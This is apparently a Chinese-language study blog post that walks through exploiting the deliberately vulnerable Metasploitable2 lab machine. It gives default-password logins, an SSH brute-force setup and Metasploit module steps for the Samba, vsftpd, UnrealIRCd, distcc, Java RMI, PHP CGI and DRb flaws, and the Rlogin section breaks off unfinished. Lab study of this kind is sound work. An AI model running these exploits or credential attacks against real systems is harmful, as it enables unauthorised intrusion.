metasploitable2 漏洞合集學習

弱密碼 Weak Password

系統或者數據庫的登錄用戶,密碼簡單或者和用戶名相同,容易通過暴力破解手段來獲取密碼。
所有使用用戶名/密碼登錄的系統/軟件都有可能存在此問題。

在Metasploitable2中,系統口令、MySQL、PostgresQL和VNC遠程登錄都存在弱密碼漏洞

系統弱密碼登錄
telnet 192.168.56.102	//使用msfadmin登錄

在這裏插入圖片描述

Mysql弱密碼登錄
mysql -h 192.168.56.102 -u root

在這裏插入圖片描述

PostgreSQL弱密碼登錄
psql -h 192.168.56.102 -U postgres		//密碼:postgres

在這裏插入圖片描述

VNC弱密碼登錄
vncviewer 192.168.56.102	//密碼:password

在這裏插入圖片描述
在這裏插入圖片描述

Samba MS-RPC Shell命令注入漏洞

Samba 中負責在 SAM 數據庫更新用戶口令的代碼未經過濾便將用戶輸入傳輸給了
/bin/sh。
如果在調用 smb.conf 中定義的外部腳本時,通過對 /bin/sh 的MS-RPC調用提交了惡意輸入的話,就可能允許攻擊者以 nobody 用戶的權限執行任意命令。

1. 在kali 中執行msfconsole,啓動 metasploit
2. use exploit/multi/samba/usermap_script選擇漏洞
3. set RHOST 192.168.56.102 設置要攻擊的機器IP
4. run,開始攻擊
5. 利用成功,執行uname -a驗證

在這裏插入圖片描述

Vsftpd 源碼包後門漏洞

在特定版本的vsftpd服務器程序中,被人惡意植入代碼,當用戶名以“:)”爲結尾,服務器就會在6200端口監聽,並且能夠執行任意代碼。

1.在kali 中執行msfconsole,啓動metasploit
2.use exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞
3.set RHOST 192.168.56.102 設置要攻擊的機器IP
4.run,開始攻擊
5.利用成功,執行uname -a驗證

在這裏插入圖片描述

UnreallRCd 後門漏洞

在2009年11月到2010年6月間分佈於某些鏡面站點的 UnreallRCd,在 DEBUG3DOLOG_SYSTEM 宏中包含外部引入的惡意代碼,遠程攻擊者能夠執行任意代碼。

1.在kali中執行msfconsole,啓動metasploit
2.use exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞
3.set RHOST 192.168.56.102設置要攻擊的機器IP
4.run,開始攻擊
5.利用成功,執行uname -a驗證

在這裏插入圖片描述

Java RMI SERVER 命令執行漏洞

Java RMI Serve 的 RMI 註冊表和 RMI 激活服務的默認配置存在安全漏洞,可被利用導致代碼執行。

1.在kali中執行msfconsole,啓動metasploit
2.use exploit/multi/misc/java_rmi_server,選擇漏洞
3.set RHOST 192.168.56.102設置要攻擊的機器IP
4.run,開始攻擊
5.利用成功,得到 meterpreter shell

在這裏插入圖片描述

Root用戶弱口令漏洞(SSH爆破)

靶機root用戶存在弱口令漏洞,在使用指南里並沒有指出。.

打開metasploit framework依次輸入:
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 7.7.5.251
set USERNAME root
set PASS_FILE/tmp/root/pass.txt(字典文件,需要預先生成)
set THREADS 50
run

在這裏插入圖片描述
root口令爆破成功,口令爲root
ssh [email protected] 成功登陸。

Distcc 後門漏洞

Distcc 用於大量代碼在網絡服務器上的分佈式編譯,但是如果配置不嚴格,容易被濫用執行命令,該漏洞是 xcode1.5 版本及其他版本的 distcc2.x 版本配置對於服務器端口的訪問不限制。

1.在kali 中執行msfconsole,啓動metasploit
2.msf>use exploit/unix/misc/distcc_exec選擇漏洞
3.set RHOST 192.168.56.102 設置要攻擊的機器IP
4.run,開始攻擊
5.利用成功,執行id查看權限,uname -a驗證服務器信息

在這裏插入圖片描述

PHP CGI 參數注入執行漏洞

GI腳本沒有正確處理請求參數,導致源代碼泄露,允許遠程攻擊者在請求參數中插入執行命令。

1.在kali中執行msfconsole,啓動metasploit
2.msf>use exploit/multi/http/php_cgi_arg_injection 選擇漏洞
3.set RHOST 192.168.56.102 設置要攻擊的機器lP
4.run,開始攻擊
5.meterpreter> Is 獲得 meterpreter

在這裏插入圖片描述

Druby 遠程代碼執行漏洞

Druby配置不當,被濫用執行命令。

1.在kali中執行msfconsole,啓動metasploit
2.msf>use exploit/linux/misc/drb_remote_codeexec 選擇漏洞
3.set RHOST 192.168.56.102 設置要攻擊的機器lP
4.run,開始攻擊
5.利用成功,執行id查看權限,uname -a驗證服務器信息

在這裏插入圖片描述

Ingreslock 後門漏洞

Ingreslock 後門程序監聽在1524端口,連接到1524端口就可以直接獲得root權限

1.在kali中執行命令行 telnet 192.168.56.102 1524
2.獲得 root 權限
3.執行uname -a驗證

在這裏插入圖片描述

Rlogin 後門漏洞

TCP端口512,513和514爲著名的rlogin 提供服務。
在系統中被錯誤配置從而允許遠程訪問者從任何地方訪問(標準的,rhosts++)。
要利用這個配置,確保rsh客戶端已經安裝(在linux操作系統上安裝例如Open SSH),然後以root權限運行下列命令,如果被提示需要一個SSH祕鑰,這表示rsh 客戶端沒有安裝,ubuntu一般默認使用SSH(Debian GNU/Linux也是如此)。

發佈了198 篇原創文章 · 獲贊 27 · 訪問量 1萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章